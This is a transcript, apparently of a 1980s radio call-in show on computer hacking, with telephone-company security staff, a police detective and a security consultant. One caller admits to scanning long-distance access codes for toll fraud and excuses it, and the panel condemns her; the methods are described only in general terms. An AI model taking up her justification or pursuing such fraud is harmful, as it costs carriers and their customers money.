+CM: I'm responsible for computer security for the Ameritech companies. I also
+    happen to have auditing for Ameritech Applied Technologies, physical
+    security for our company.  That kind of stuff.
+ES: Big job!
+CM: Yes.  We are involved with hackers regularly all the time.
+ES: Good to have you here tonight Chuck.  Also I would like to introduce Mr.
+    Bob Gates, manager of Corporate Security also with Ameritech Applied
+    Technologies.
+BG: Good Morning.
+ES: And a good morning to you.  Bob previously was a police officer.  You have
+    been in Corporate Security at Ameritech for how long now Bob?
+BG: Since divestiture which was in January 1984.  Its a much more specialized
+    field and you deal with one particular aspect of the whole scenario.
+ES: Is it correct, are our callers correct?  Do you ring people's phones at
+    various hours of the day and night?  Are there "ghost" rings?  Are there
+    people out there playing around?  Is it the phone company or is it others?
+    What's going on?
+CM: Well, I've been in this telephone business for 22 years now.
+ES  Okay now this is the Director of Internal Affairs for Ameritech Applied
+    Technologies, Mr. Moran, go ahead.
+CM: In my days at Illinois Bell, we very often heard these complaints.  We
+    kept trying to find out what it was some of the things the we've
+    discovered is the computer hackers!  They love to scan a prefix and look
+    for a computer tone. They want a computer to talk to, so it'll ring a
+    phone.  Their computer will ring your phone.
+ES: Now this can be done from the bedroom of a thirteen year of a computer
+    phreak right?  Or anybody else for that matter.
+CM: If he has got a semi-good computer mind he can do it while he is asleep.
+    He can program his PC to use his modem to dial your number.
+ES: Is most of the computer hacking and unauthorized use of computers done in
+    the off hours?  In other words its not people in business during the day,
+    right?  Would that be basically your computer hacker description?
+CM: People still have to live, they still have to have jobs to feed themselves,
+    and they still have to go to school or go to classes and so your going to
+    find that since hacking is a hobby, it is going to done during their free
+    time.  Which is typically evenings, weekends, and vacation periods.
+ES: I guess what I'm getting at here is I'm trying to establish most of the the
+    computer related misbehavior comes more from private homes than from
+    business offices.
+CM: No. The studies seem to indicate that 80% of computer abusers are in fact
+    people in business and are abusing their own company, but that is not going
+    to cause your phone to ring.  The people who are using the network to call
+    and look for computers are the people which we typically call hackers,
+    which amount for 15-25% of the computer abuse that goes on in the world.
+ES: How concerned is Ameritech and the other technology and phone
+    companies around the country about all of this?
+CM: Well just as any business Ameritech is highly dependent upon information
+    systems to survive.  So we are concerned with whatever risks go with
+    computer usage.
+ES: Did you both see the film WarGames with Matthew Broderick?
+CM and BG: Yeah.
+ES: Now while the plot is pretty far-out, the theory is workable, correct?
+BG: The natural inquisitiveness of the youthful mind, the need to explore.
+ES: We've heard stories about computer hackers who have gotten into computers
+    in government offices, high schools, colleges, and universities.  They've
+    changed grades, added and subtracted information from formulas, and done
+    all kinds of things.
+
+    Payroll records have been changed and we've got a thing now called the
+    computer virus.  We've got a conviction of a guy who is going to jail for
+    literally destroying a computer program two days after he left the company
+    and apparently that is something that computer people are very worried
+    about.
+
+    Are we going to end up with a huge number of people called "computer
+    police" here at some point?  To get a handle on all of this, is that what
+    we need?
+BG: I think computer security is just a natural extension of using your
+    computers to ensure that they are used in a secure manner.  That they
+    aren't tampered with and they aren't abused.  To do that you have to take
+    some degree of effort to protect your computer system.
+ES: Is law enforcement geared up to deal with the kinds of crimes that you guys
+    are working on, investigating and trying to deal with?
+BG: Law enforcement does have experts with them.  They also have to investigate
+    everything else that occurs.  So it becomes a priority item to private
+    companies to make a commitment to look at it themselves to protect their
+    systems and include law enforcement if appropriate.
+ES: Is there a naivety on the part of a lot of people that just left computer
+    systems unguarded.
+BG: Yes.  In reference to the law enforcement, in our current criminal justice
+    system I know that in the states that we deal with and the federal agencies
+    that I have dealt with part of the problem is finding a prosecutor, a
+    judge, and a jury that understands what a computer crime is,  Because they
+    are not computer literate.
+ES: Well stealing information and stealing time are crimes.  How about the
+    stories of computer hackers breaking into computers at nuclear laboratories
+    like Lawrence Livermore Laboratories in California.  This is where they do
+    the research on nuclear weapons and God knows what else.  Think of the
+    potential of this kind of misbehavior it's frightening.
+BG: That's why computer security has become a hot job.
+EZ: I'm still trying to focus on my immediate problem here which was the
+    question of the ghost rings.  What I'm hearing you say is that you think
+    that the ghost rings are primarily the work of hackers.
+CM: I think its a very plausible cause.
+EZ: The question that people raise about this of course is that you can see it
+    happening once in a while, but why all the time on a regular basis?
+CM: The computer hacker scans prefixes and will set his dialer look for
+    computer tones.  He may find a few numbers and tell two or three friends.
+    Those two or three friends will now tell two or three other friends.  They
+    will see these numbers and then they will go and scan that whole thousand
+    number group again.
+EZ: I still don't quite see why the ghost rings occur at exactly the same time
+    all of the time.
+CM: I can't answer that.
+ES: I respond to that by saying the times are most likely approximate.  Most
+    people's watches aren't perfect and neither are their memories.  However
+    if the majority of the hackers are in high school, then they are probably
+    going to sleep at about the same time every night and setting their dialers
+    to run while they are asleep, therefore hitting the same numbers at roughly
+    the same time every night.
+
+    Is it correct to say that they can program these computers to do this work
+    without any billing information being generated?  And how can they do this?
+    Or is that an area we should stay away from,  I don't want to compromise
+    you guys.
+BG: You're talking toll fraud and that's really not my area of expertise.  Toll
+    fraud is a fact of life, but I'm not a toll fraud person.
+CM: The presumption is that the billing doesn't kick in for a split second
+    after the phone is picked up and that is what enables these guys to get
+    away with this.
+BG: Talk to Ken.
+ES: Ken will tell you things that you'll never be able to talk about on the
+    radio or write about I'm afraid.  We're going to get into some other
+    elements of all of this.  Are the penalties for computer hackers set to
+    meet the crime these days? I mean do we catch many of them do they get
+    punished and does the punishment fit the crime?
+CM: The computer hackers that usually get caught are juveniles, which means the
+    most you can do is keep them in jail until they are 21 and confiscate their
+    computer equipment.  The U.S. Attorneys Office in the Northern District for
+    Illinois did in fact return a juvenile indictment against a hacker who used
+    the code name SHADOW HAWK.  It made the front page of the Chicago Tribune.
+ES: What did he do?  Can you tell us?
+CM: According to the Tribune, he stole software from AT&T.
+ES: This proves that as smart as some of these hackers are, some of them get
+    caught, maybe even a lot of them get caught.  So as hard as they're working
+    to defy the system apparently you people are working from inside the system
+    to foil what they are doing and catch them.
+CM: Exactly
+ES: If you don't prosecute them when you catch then then it will not mean a
+    thing so does that mean that the various phone companies and their
+    subsidiaries have got a very serious mood about prosecuting if you catch
+    people?  Is that the way of the future?
+CM: Every case is different.  Prosecution is always an option.
+ES: Are we a couple of years late in dealing with this problem?
+BG: The laws typically catch up to the need.  You have to identify a problem
+    before you can really address it.
+ES: We have made arrangements thanks to our guests tonight to speak to an
+    Illinois State police detective sergeant who works on computer fraud;
+    Sergeant Abagail Abraham.
+AA: Good morning I appreciate being here.
+ES: Have you been listening to the radio prior to our call?
+AA: I've been glued to the radio yes.
+ES: Okay.  Your unit is called Computer Crime Section?
+AA: Sure.
+ES: How long have you been in existence?
+AA: Since February 1986.
+ES: There obviously was a need for it.  Do we have enough state laws or state
+    statutes for you to do what you have to do?
+AA: I think so.  At the time that the section came into existence, the laws
+    were not very good.  Most computer crimes were misdemeanors until a few
+    months later when the attorney general held hearings in which we
+    participated and thus they drafted a law.
+
+ES: Sergeant, is it handled better at the state level as opposed to the federal
+    level?  The gentlemen here from Ameritech mentions that the US Attorneys
+    Office has recently brought a prosecution here in Northern Illinois.  Is
+    his office going to be doing much more of this or do you see it being done
+    at a state level?
+AA: I think it depends upon the kind of case.  Certain cases are probably
+    better handled at the federal level and certain cases are handled best at
+    the local.  When dealing with the federal agencies, the jurisdiction for
+    computer fraud is shared between the FBI and the Secret Service.  So it
+    depends upon the nature of the case as to which agency would take it, but
+    many cases are not appropriate for the federal government to take part in.
+ES: Let's say we have a student who changes a grade in a school computer
+    system.  That would be more a state case I would presume than a federal
+    case right?
+AA: Certainly it would be likely to be a state case, we had a case like that.
+ES: If you were able to develop a case like that and have evidence, are you
+    liable to get a conviction?  Our guests were saying that the courts don't
+    necessarily understand all of this.  When you go into state court on this
+    kind of a thing are you getting judges and/or juries who understand what
+    you're talking about?
+AA: Well we have had no cases go to jury trials.  As a matter of fact, no cases
+    have even gone to bench trials because as like the vast majority of cases
+    in the system they are plead out.
+ES: They plead guilty?
+AA: We have a 100% conviction rate.
+ES: Really!
+AA: Our success is based very good cooperation from state's attorneys offices.
+    We've had no problems bringing our cases to them.
+ES: Your data is so good that by the time you make your pinch there is no way
+    they can talk their way out of it.  You've got them dead to rights.
+AA: Yeah, we haven't had a problem with that.
+ES: What kind of penalties are you getting Sarg?
+AA: All of our cases have had a 100% conviction rate, be we haven't had that
+    many finally adjudicated.  They are in various stages because the law is so
+    new.
+ES: I presume that you're going to continue working very hard put more people
+    in jail.
+AA: Yes, it's a growth industry.
+ES: Is Director Margolis supportive of what you are doing?
+AA: I think so.  Our unit came into existence under the prior director, Zegal,
+    but Director Margolis has been very supportive of our efforts and I suspect
+    that he will become even more so.
+ES: Do people who are victims of computer crime know who to report it to? If
+    you operate a business and your computer has been violated or anything at
+    all has been done to you, does the average computer owner know who to
+    report it to?
+AA: No.  That's a really easy question!
+BG: I would, but only because I'm in the industry.  However, the average small
+    business man would probably be somewhat at a loss.
+AA: He might not even realize that is is a crime.
+BG: That's exactly true and fortunately Illinois has had the foresight to put
+    together a unit such as the Sergeant's.
+ES: Let's say there is a medium size company that uses computers.  I'll invent
+    a company.  My name is Mr. X and I own a a fairly nice real estate company
+    in the neighborhood of Chicago.  I've got maybe a dozen employees and a
+    couple of years ago we went to computers to keep track of our listings, and
+    all of our accounting and our bookkeeping, our past customers, and all our
+    contactees.  I mean we've got a lot of data.  We communicate with some
+    other real estate agencies and so we use modems, telephone lines and let
+    computers talk to computers.  Since some of this work is done when our
+    office is closed, we leave our system hooked up.  I came in yesterday
+    morning and low-and-behold somebody got into our computer and erased all of
+    our data, or part of it, or changed something.  I am the victim of a crime
+    should I pick up the phone and call the Illinois State Police
+AA: Sure.
+ES: You'll show up and you'll investigate?
+AA: Sure.
+ES: Okay.
+AA: There are several ways in which a case can get to us.  One of them is that
+    you as the victim could contact us directly and another way would be to
+    contact the local police and hope that they would call us.
+ES: There's the key word...hope.  Does the Chicago Police, the Wilmette
+    police, the Joliet police, do they know enough to refer these cases to you?
+AA: I don't know if Joliet does, but Chicago and Wilmette certainly do.  For
+    any of the police that are out there listening at this point let me add
+    that if we were to get a case referred to us, we will handle the case in
+    any one of a number of ways.  If the local agency brings it to us and wants
+    nothing to do with the case because they have too much on their own we will
+    take the case over.  If they would just like to either work cooperatively
+    or have us go with them on an interview or two to translate what the victim
+    may be saying we'd be happy to do that too.  So we have enough work to do
+    now that we need not take cases over.  We are happy to work with any
+    agency.
+CM: I think one thing worth pointing out here is that we're focusing on on a
+    crime via telephone.  Computer crime is done from afar where the victim
+    doesn't know the offender.
+AA: That's true.
+CM: The majority of cases probably don't involve telephones at all.  They
+    involve companies' own employees who are committing what amounts to
+    embezzlement using computers.  Either transferring money by computer to
+    their own accounts or somehow playing with the books and the employer might
+    not realize for a long time until some auditing process occurs that the
+    crime has even occurred.
+AA: You're right.  There are a number of cases like that.  What happens very
+    often in a case like that when it is somebody in-house is that the company
+    will choose to not call it to the attention of the police they will choose
+    instead to take disciplinary action or fire the person.  Their argument
+    most times is that they don't want the embarrassment. We do not go out and
+    seek headlines unless our victim is interested in having headline sought.
+    We don't choose to publicize cases and embarrass our victim.  The stuff is
+    simply not reported that much.
+EZ: I was talking to a computer consultant once who said that the higher you
+    are up in the company if you're involved with something like this the less
+    likelihood there is of not only you never doing time, but even getting any
+    sort of penalty involved.  I was there was one particular case of a guy who
+    was an executive vice president for a bank who I think stole some
+    phenomenal amount of money was in the millions who was discovered after
+    some period of time and they didn't want it to get out that one their
+    trusted employees was a crook so they gave threw this guy a retirement
+    banquet
+ES: Hahahahahaha.
+EZ: They retired him from the company and he left with honors.
+AA: I like this....
+EZ: The consultant said he was there and it was the most hypocritical thing he
+    ever saw, but they will do it to avoid the unfavorable publicity.
+ES: I believe it.
+AA: Certainly if you are high in the organization and you control things then
+    you can control various procedures so that you are less likely to be caught
+    and you are probably in control of enough money that you are able to come
+    up with creative ways to embezzle it with less suspicion aroused.  I'm not
+    sure why, but the more money you take the less likely you are to get
+    prosecuted.
+ES: People admire these kinds of crime.
+
+           (Commercial Break and then reintroductions including...)
+
+ES: I want to welcome a new player to our game tonight, Mr. John Maxfield.
+    John Maxfield owns a corporate security consulting company.  John...are you
+    there?
+JM: Yes I am, good morning.
+ES: Good morning I guess you are outside of Chicago and are you close enough to
+    have been listening to our program?
+JM: Well ahhhhh, unfortunately ahhhh I'm ahhh a bit to the east of you and I
+    had a little trouble listening in on the radio so uhhh I've been listening
+    the last few minutes on the telephone.
+ES: We've gotten into all kinds of data here.  Have you and the sergeant ever
+    talked before?
+JM: I don't believe so.  I may have talked to somebody in the Illinois State
+    Police ummmm maybe a year or so ago, but it was not the sergeant.
+ES: Sergeant Abraham you're still there, correct?
+AA: Yes.  I'm here
+ES: I presume John that you know Chuck Moran and Bob Gates.
+JM: Yes I ahhh am acquainted with ah Bob Gates.
+ES: What does a private computer security company do?
+JM: Well uhhh we get involved with ahhhhhh ahhhhh the cases that perhaps don't
+    make the headlines.  Ummmmm and my role is more of kind of in counseling
+    clients as to how they should secure their systems and to acquaint them
+    with the risks and the kind of the nature of the enemy what they are up
+    against.
+ES: We were talking earlier about a movie called WarGames which I'm sure you
+    must be familiar with.  My guests have been telling us a little bit about
+    some of the things that go on. I suspect that the computer hacking problem
+    and related behaviors is probably very severe isn't it?
+JM: Yes ahhh it certainly is a growing problem  The movie WarGames kind of put
+    out into the public eye what had been going on very quietly behind the
+    scenes for a number of years.  And uhhh of course as a result of WarGames I
+    think there was an increase in hacking activity because now a lot of the
+    uhhh hackers suddenly realized that it was something that maybe something
+    they should do and achieve notoriety.
+ES: I have a question here that may or may not have an answer.  Why is that the
+    legitimate use of the computer isn't enough to satisfy its user or owner.
+    In other words, why hack?  Why misbehave?  Why break the law?  Why cost
+    people a fortune?  I mean there are so many fascinating things you can do
+    with a computer without breaking the law why are so many people into this
+    anti-social, anti-business behavior?
+JM: Well that's a difficult question..ahhhhhh you could say "why do we have
+    criminals?" You know when you know there's plenty of gainful employment out
+    there.  Ahhhhh the thing with the computer hackers uhhh most of them are
+    thrill seekers. ahhh they are not the kind of people that are going to be
+    ahhhh good achievers with computers they're really only know how to do the
+    destructive things.  They're kind of the analog of the vandal.  Ahhhh
+    they're not really ahhh some of them are very bright but they're very
+    misguided.  Misdirected.  And uhhh it's it's kind of hard to make a
+    generalization or a stereotype because they do kind of cover a wide
+    spectrum.  We've got a one end of the spectrum a lot of these young kids
+    ahhh teenagers.  And they mostly seem to be boys there is very few female
+    hackers out there.
+ES: really?
+JM: Yeah that's an interesting phenomenon.  I would say that maybe there is one
+    girl for every ten thousand boys.  But ahhh anyway at the one end of the
+    spectrum we have these kids that are just kind of running loose they really
+    don't know how to do very much but ahhhh when they do manage to do it they
+    do a lot of damage.  Just by sheer numbers.  And then on the other end of
+    the spectrum you perhaps got a the career criminal whose chosen to commit
+    his crimes over the telephone line.  Instead of you know holding up people
+    with guns uhhh he robs banks by telephone.  So you've got this wide
+    spectrum and it's very hard to put a stereo type to it, but most of the
+    hackers start out because there's kind of a thrill there's sort thrill of
+    ripping off the phone company or breaking into a bank computer and
+    destroying data or something. There's a ahhhh kind of a power trip
+    involved.
+ES: Now what you're trying to do is advise your clients how to avoid this
+    before it happens.  Do most of them end up getting burned before they come
+    to you or are people smart enough to invest early?
+JM: Security unfortunately in the business world tends to take kind of a back
+    seat because it doesn't generate profits, it doesn't generate any revenue.
+    It's an expense uhhh if if you're worried about burglars and you live in a
+    big city like I do or like Chicago.  Then you know you've got to spend
+    extra money for locks and burglar alarms and it's a nuisance you've gotta
+    unlock your door with three different keys and throw back all these dead
+    bolts and stuff and turn the burglar alarm off and back on again when you
+    leave so it's a big nuisance. So security tends to be left sort of as the
+    last thing you do.  And uhhh of course after a corporations been hit their
+    data's been damaged or stolen or destroyed or whatever.  Then they can't
+    spend enough money, you know, to keep it from happening again.
+ES: We have been told there is not premise that is burglar proof, there is no
+    person regardless of their importance in this world who is totally
+    protectable.  Is a computer or a computer system totally protectable?  I
+    mean can you teach somebody how to secure the system so the hacker just
+    can't get at it?
+JM: Quite frankly you're you're correct. I think the only secure computer is
+    one that is unplugged.  Or you change all the passwords and don't write
+    them down so no one can log on.  Like any other form of security if you put
+    enough locks and bars on your doors and windows the burglar's going to go
+    somewhere else where its easier pickings.  The same is true with computer
+    security.  You can secure your system from all but the really ummmm you
+    know intense organized attack.  Now obviously in industry we've got certain
+    segments that are targets, if you will.  Banks obviously are a target,
+    that's where the money is.
+ES: If computers are so capable and so smart, can't we say to a computer "Okay
+    Computer, protect yourself"?
+JM: The computer actually is fairly capable of defending itself, the only
+    problem is it's not intelligent.  Uhh and it doesn't really care you see
+    whether somebody breaks in or not. You see there's no human in the loop, if
+    you will.  So you have to have you have to have a human someplace that
+    looks at the exception report that the computer generates and says "hey!
+    What's all these two o'clock in the morning logons...those accounts are
+    supposed to be active at that time of night."  Now you can program a
+    computer to do some of that, but you still need a human auditor to
+    scrutinize the workings of the system ever now and then just to be sure
+    that the computer is protecting what its supposed to protect.
+ES: John, what's the name of your company?
+JM: My company is called BoardScan and we're in Detroit Michigan
+ES: We have some callers, first up is young lady by the name of Penny.  Are you
+    there Penny?
+P:  Yes I am Ed, how are you?
+ES: Good.  Are you enjoying the program?
+P:  Yes!  I'm a victim!
+ES: A victim! Tell us how.
+P:  We moved in about three months ago, two of our phones are rotary service
+    and one of them is a cheapy touch-tone that you go from touch to pulse or
+    something on it.  When somebody dials out on one of the rotary phones, this
+    cheapy phone beeps back at us.  Well I don't mind it too much because I've
+    got little kids and I get to know who's using the phone.  Except, 10:38 at
+    night when my kids are sleeping and I'm sitting in the family room, my
+    little touch-tone phone beeps at me. Twice.
+JM: Oh I think I can explain that, perhaps.  Now it just beeps...
+P:  Twice!
+JM: It does it every night about the same time?
+P:  Just about, yeah.
+JM: Well there's an automatic scanner in every telephone exchange that runs at
+    night testing lines.
+ES: Oh no! Now wait a minute!
+P:  Now wait a minute!  They said that doesn't happen! No no no no.
+ES: The phone company all right.  This is the one thing that everybody we've
+    talked to in the telephone industry has denied!
+EZ: We, ahh, yeah....
+ES: Go ahead Ed!  Take over, take over
+EZ: We talked to a number of people at the phone company and the original
+    thought was the phone company was doing some sort of testing, but the
+    people at the phone company we talked to said "no...they don't."  That
+    testing occurs only when the actual connection is made in a routine phone
+    call.  This is part of the on-going sort of testing program.  There is no
+    additional testing, however, they said.  Now does it work differently in
+    Michigan?
+JM: Well I don't know.  I know I have a phone that ahhh will ahh...it's got
+    like a little buzzer in it and it will go "tick- tock" at about 1:30am
+    every night.  And ummmm if you're on a if you're on one of the older
+    electro-mechanical exchanges uhh then I dare say there is a scanner that
+    does scan all the lines at night.  And it it only stops on each line for
+    about oh a 1/2 second...just long enough to make your phone go beep-beep.
+    And I'm sure that's what the explanation is. I am pretty qualified, before
+    I got computer security work I used to install telephone exchanges.
+P:  Okay, I have a home computer.  It's a Commodore I do not have a modem.  Is
+    there anyway that I could get one and verify this?
+JM: Ahhhhh I don't what a modem would have to do with the telephone company
+    testing your line at 10:30 at night.  I don't see the connection there.
+P:  What would verify it?  Could I verify that I'm being used as a test or
+    would it verify that I'm being scanned by some other computer someplace?
+JM: Well no.  If you were being scanned by a hacker, you'd be getting an actual
+    ring, you wouldn't get just say a short beep.
+EZ: Penny where do you live?
+P:  Oaklawn.
+EZ: Would you be willing to participate in a little experiment?
+P:  Sure, it happens pretty regularly.
+EZ: Okay. Well is it every night or just some nights?
+P:  6 nights out of 10.  More than 50-50.  It happened tonight as a matter of
+    fact.
+EZ: Okay well tell you what.
+P:  It happened last night as a matter of fact!
+ES: Penny, we'll get your name and your number and Ed is going to
+    call you during the day and do a little work with you, okay?
+P:  Sounds good.
+ES: Thanks Penny.  Hold on a minute okay?
+P:  Thank you.
+ES: You see now, Mr Maxfield is telling us something that every source we've
+    gone to has denied.  There's no such thing they tell us as of random
+    testing of the phone network either by the local phone company or by AT&T
+    they say to us "what for?"  There's no need to do it.  There's no reason to
+    do it.  Let me ask our guests in the studio here from Ameritech.  Has
+    either one of you ever heard of anything like this?  Is it the kind of
+    thing that either one of you can address?  I know that you're computer
+    guys, but what about this?
+CM: I know who you've talked to over at Illinois Bell Security and at one time
+    historically they used to do testing, but they stopped that when I was
+    still at Illinois Bell.
+ES: So this is some years ago.
+CM: Yeah.
+EZ: Now did it only apply to the electro-mechanical systems?
+CM: The only offices I ever worked out of were electro-mechanical, so yes.
+JM: Well I don't know. That would be my first guess because I know when I was
+    on electro-mechanical exchange here in Detroit that's what would happen
+    every night.
+ES: It's a different phone company.
+JM: Well I know, it's the same equipment though.  Now on two electronic
+    switching systems the line is tested every time you make a call.  So there
+    isn't any scanner like that.  I think the mystery would be solved by just
+    verifying what kind of equipment you know she was being served out of.
+EZ: It never dawned on us that that would make a difference.
+
+           (Commercial Break and then reintroductions including...)
+
+ES: I've got a call coming in here long distance from Missouri. Anna are you
+    there?
+A:  Yes I am.
+ES: Where in Missouri are you?
+A:  I'm in Kansas City.
+ES: And you're listening to us tonight?
+A:  Yes.
+ES: Okay now my producer tells me that when you called up you identified
+    yourself as a computer hacker, is that correct?
+A:  I am a female phone hacker and computer hacker, Yes.
+ES: One of the few because apparently mostly males are into this.
+A:  Uh-huh.
+ES: Anna, talk up a little bit louder.  How old are you?
+A:  I'm 27.
+ES: Twenty seven years old and do you have a job?
+A:  No.
+ES: You don't?!
+A:  No I have a lot of idle time.
+ES: And you're a computer hacker. By definition what do you do
+    with your computer that makes you a hacker?
+A:  Well I scan out codes that residents and companies have with US Sprint and
+    different companies and I've used about fifteen thousand dollars worth of
+    free long distance.
+ES: Are you calling free right now?
+A:  Yes I am. I am not paying for this call.
+ES: Your computer has allowed you to make an illegal long distance call?
+A:  Through the computer I obtain the codes and then I dial codes with the
+    touch-tone.
+ES: Sergeant, should I be talking to her since she's committing crime right
+    now.  Am I aiding and abetting her? No wait..no.  I've got a police officer
+    on here....Sarge?
+AA: Yes.
+ES: What do you think?  Should we continue with this?
+AA: I'd be real curious to know what her justification is for her behavior.
+ES: How about that Ann, how about giving us an answer for this?
+A:  Well I have a lot of idle time and very little money and I like to talk to
+    a lot of my friends.  I have a suggestion for companies and residents out
+    there who might have remote access codes.  You might make them difficult,
+    not not easy where hackers could, you know the first things they try are
+    like 1-2-3-4, etc.
+ES: Well let me ask you a question Anna.  Have you found your computer hacking
+    to be relatively easy to do?
+A:  Yes I have.
+ES: So you're saying that the computer people of the world have not tried hard
+    enough to keep you out?
+A:  No they haven't.  I would suggest as far as the phone companies who use
+    remote access codes to make the codes more difficult.
+ES: When we run into people like Anna who obviously have some intuitive talent
+    and some success at this, why don't we hire some of these people and put
+    their knowledge to work?
+AA: No!
+ES: No?
+JM: No. No.  I'd have to say no to that also.
+A:  Why not?
+JM: You have to understand the the technical side of it.  Just knowing how to
+    hack out a code doesn't qualify you as knowing how to change they system so
+    you can't hack codes anymore.
+AA: There's a perception that these people are all whiz-kids and I don't think
+    that's the case.
+ES: Are you a whiz-kid Anna?
+A:  No, I don't always use the computer to find these codes I have a lot of
+    friends and I also do some hacking of my own and there are a lot of
+    different methods.  What you figure out is what how many digits are in the
+    codes and different things like that so it does require some brains.
+    Unless you have friends of course and that's all you rely on.
+ES: Do you not understand that what you are doing is illegal?  Does that not
+    even enter into the equation?
+A:  Of course I understand that!  Yes.
+ES: That what you are doing somebody else ultimately has to pay for Doesn't
+    that bother you?  I mean if you were the victim of a thief or a burglar, I
+    presume you would call the police and you'd scream and yell until they did
+    something about it. And yet you and so many thousands of other people think
+    nothing of committing thievery and fraud by wire and God knows what other
+    crimes and because your victim is not sitting in the same room with you it
+    just doesn't seem to bother you.
+A:  Well I haven't I haven't physically bodily hurt anybody and it's mostly
+    companies you know that I've dealt with.
+ES: That makes it okay?  Companies are made up of people. Sometimes they're
+    privately owned and sometimes they're made up of stockholders, but
+    companies are people and so you're hurting people.
+CM: I don't know what service she's coming through on, but you gotta remember
+    its costing that company money right now to enable her to talk and they've
+    got to recover those costs from their legitimate customers.
+A:  Don't they just use it as a tax write-off?
+BG: No.
+JM: There's been some of the smaller long distance companies, some of the
+    people that resell service provided by AT&T or Sprint, some of these
+    smaller companies have actually been bankrupted by people like Anna.
+A:  Well I happen to know the person who bankrupted one of them.
+AA: I don't see why that's something that would make anybody proud.
+A:  I'm not proud to know this person.
+AA: Why would you be proud to do what you're doing because you're doing the
+    exact same thing, just perhaps not at the same scale.
+A:  Well I don't I don't deal with small time companies.
+AA: So, you and many people like you are costing large companies a enormous sum
+    of money.  You're the people you're the reason that a company like Sprint
+    is not profitable and could in fact bankrupt or could have to lay people
+    off and could put people out of work.
+A:  They're not profitable?
+JM: Sprint has been losing money almost since the beginning.
+CM: Or just make a basic rate increase which makes phone service less
+    affordable.
+EZ: My long distance company is All-Net which has had to change access codes
+    three times in the last year.  Primarily because of hackers and I don't
+    think it's ever been profitable.
+CM: Which is inconvenient to you as a customer.
+EZ: Sure
+ES: I think what bothers me the most out of this whole thing with Anna is the
+    fact that she is, committing crime literally every day and just doesn't
+    acknowledge that as either morally offensive.
+JM: Yes you've hit on the crux of the problem here.  Ahhh these phone phreaks
+    and hackers really don't see themselves as criminals and the crime here is
+    totally anonymous it's as simple as dialing some numbers on a telephone
+    that belong to someone else.  Okay and so there is no victim.  I mean the
+    hacker or the phone phreak doesn't even know the victim that ahh they're
+    billing the call to.  In most cases.
+ES: Like the burglar who burglarizes during the day when nobody is home he
+    doesn't see the faces of his victims and so its a very impersonal crime.
+    Anna how would you feel if someday you get  a knock on the door and it's
+    the FBI or the Secret Service and they have finally tracked you down and
+    the US Attorney for Kansas City decides to indict you and they've got a
+    good case and you end up going to prison.  How would you feel then?
+A:  My original reason for taking an interest in this particular hobby is that
+    someone got hold of my AT&T calling card and ran up my phone bill to
+    several thousand dollars and I took an interest in it to find out
+    originally what was going on with it.  Now I have had contact with the
+    Secret Service and the FBI and they didn't do anything about the person who
+    offended me.  They didn't do anything at all.
+AA: That doesn't answer the question.
+ES: Well what's going to happen if they come back and grab you?  How would you
+    feel if you ended up having to go to prison?
+A:  I guess those are the breaks.
+ES: Are you married or single?
+A:  I'm single.
+ES: Does your family know that you're involved in all this?
+A:  Yes they do.
+ES: I mean how would they react if you ended up being arrested?
+A:  I guess they wouldn't get anymore free long distance.
+ES: They're using it too!?
+A:  They have me place the calls for them.
+ES: You know what disturbs me.  You know don't sound like a stupid person, but
+    you represent a lack of morality that disturbs me greatly.  You really do.
+    I think you represent a certain way of thinking that is morally bankrupt.
+    I'm not trying to offend you, but I'm offended by you!
+A:  Well I appreciate your time and you giving me air time an everything.  I
+    thought I'd let some of you know that we are out there and look out for us.
+    Change those remote access codes to more difficult codes and...
+BG: Is that to make the challenge more difficult for you?
+A:  Possibly for some of us, but to also those hackers who don't have the
+    intelligence or don't have the friends or don't have the computers or
+    whatever they're using.
+BG: Or the idle time.
+A:  Right, the idle time.  There you go.
+ES: How do you pay your rent Anna?  Or do you live at home with your folks?
+A:  I live with my parents.
+ES: Oh...okay.
+AA: Why not take that time and do something constructive or socially useful?
+A:  Well I went out and applied for a job with US. Sprint and didn't get hired.
+AA: That's good!
+EZ: Is it any wonder?!
+ES: Anna, do you listen to this program very often?  I don't believe you've
+    ever called before have you?
+A:  No.
+ES: Do you listen every once in a while?
+A:  Yes.  I had just happened to hear through a friend that it was coming on.
+ES: Okay.  I tell you what Anna.  A little something for all new callers.  I've
+    got very fancy WGN T-shirts.  If you give my producer your name and address
+    we'll send one to you.  Okay?
+A:  Okay
+ES: We'll be right back. (Click!) She hung up.  I have to tell you the truth.
+    I thought we had her there for a minute.
+AA: Well done!
+JM: She hung up on you?
+ES: The minute we went in on the line to get her address to send her the prize
+    she hung up.
+JM: Yeah, I don't doubt that.
+ES: I'm not trying to make an enemy out of the woman, but I really am disturbed
+    by her lack of moral fiber.  I got another person on the phone claiming to
+    be a computer hacker.  Dan, are you there?
+D:  Yes
+ES: Are you a computer hacker?
+D:  No. I'm a computer science major.
+ES: Oh, okay.
+D:  I'd like to ask your security experts what types of risk avoidance is
+    involved in providing unauthorized people into corporation's computer
+    systems?
+BG: What you're asking us is what we do to try to keep unauthorized people out
+    and for me to answer that, would give away the store.
+AA: Besides it would take about two days.
+JM: I think you can answer that in generalities.  As a number we're talking
+    about I guess, telephone dial-up access to computers.
+BG: I think he's asking generically.  Just computing.  I don't think it would
+    be appropriate for me to discuss.  There is enough literature out there,
+    you're a computer science major you read the literature and I think your
+    answer lies there.
+EZ: Just to give you an example I know in terms not so much as computers, but
+    misuse of long distance credit card numbers, the All-Net people who I deal
+    with made their numbers longer which is the simplest thing you can do.
+    It's harder to find one that's working.
+JM: When protecting your computers, the first line of defense is the password.
+    Obviously you don't want to use trivial passwords.  Ahhh that's the first
+    line of defense.  After that you add on other things like dial-back,
+    encryption and various other techniques to rule out anyone with just a
+    casual ahhh attempt at access that is just not going to get through.
+ES: Dan, where are you going to school?
+D:  Right across the street from WGN, the Devry institute.
+ES: What is your feeling when you hear somebody else talk about, you just heard
+    Anna, what what's your feeling about what she's doing?
+D:  I'm not really familiar with the hackers.
+ES: Don't you see things being stolen?  Does that bother you at all?  I mean
+    you see the illegality of it? The immoral...morality of it?
+D:  I think it's very unethical because a lot of the companies have billions of
+    dollars in equipment.
+ES: It's not something you're into?  Correct?
+D:  That's correct, yes.
+ES: I'm glad.  Thanks for your call Dan.
+D:  Okay.
+ES: Hello Louis are you there?
+L:  Yes I'm here.
+ES: Okay you're on with all of our panel members Louis.
+L:  Thank you very much. I heard a story that had to do with a certain hacker
+    who had gotten inside the computer system of a let's say a large oil
+    company.  We'll leave the names out of it.  They had set up a security
+    system which automatically traces the call directly back to wherever the
+    originating connection is made and this goof called from his home.  Two or
+    three days later, he found FBI agents on his front door step.
+AA: I'm not familiar with the case, but it's certainly is within the realm of
+    possibility.
